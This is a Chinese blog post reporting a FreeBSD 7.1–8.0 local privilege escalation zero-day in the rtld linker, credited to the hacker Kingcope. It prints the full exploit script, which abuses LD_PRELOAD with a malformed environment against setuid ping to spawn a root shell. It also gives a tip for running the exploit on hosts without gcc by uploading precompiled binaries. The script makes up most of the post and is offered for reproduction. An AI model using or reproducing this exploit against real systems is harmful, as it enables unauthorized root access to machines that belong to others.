Chinaunix首页 | 论坛 | 博客
  • 博客访问: 7445732
  • 博文数量: 1758
  • 博客积分: 18684
  • 博客等级: 上将
  • 技术积分: 16252
  • 用 户 组: 普通用户
  • 注册时间: 2010-06-02 10:28
个人简介

啥也没写

文章分类

全部博文(1758)

文章存档

2024年(4)

2023年(44)

2022年(39)

2021年(46)

2020年(43)

2019年(27)

2018年(44)

2017年(50)

2016年(47)

2015年(15)

2014年(21)

2013年(43)

2012年(143)

2011年(228)

2010年(263)

2009年(384)

2008年(246)

2007年(30)

2006年(38)

2005年(2)

2004年(1)

分类: LINUX

2009-12-07 13:50:12

在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。

在展示该漏洞威力之前,我们科普一下著名黑客kingcope(kcope)。从2007年6月至今,他一共公开了12个安全漏洞(没公开的不知道有多少),其中FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。

fbsd8localroot

相关脚本如下:

#!/bin/sh
echo “FreeBSD local r00t zeroday by Kingcope on November 2009″
cat > env.c << _EOF
#include
main() {
       extern char **environ;
       environ = (char**)malloc(8096);
       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);
       execl(”/sbin/ping”, “ping”, 0);
}
_EOF
gcc env.c -o env > /dev/null 2>&1
#download from baoz.net
cat > program.c << _EOF
#include
#include
#include
#include
void _init() {
       extern char **environ;
       environ=NULL;
       system(”echo ALEX-ALEX;/bin/sh”);
}
_EOF
gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

科普一下关于漏洞利用的问题,有些同学说fbsd系统一般没gcc啥的。这个问题很好解决,自己编译好程序传上去就是了。另外如果用了fbsd的ports的系统肯定会有gcc的。

FreeBSD尚未就该0day漏洞发布安全公告及官方补丁,敬请关注素包子的博客以获取该漏洞的最新情况。

阅读(929) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~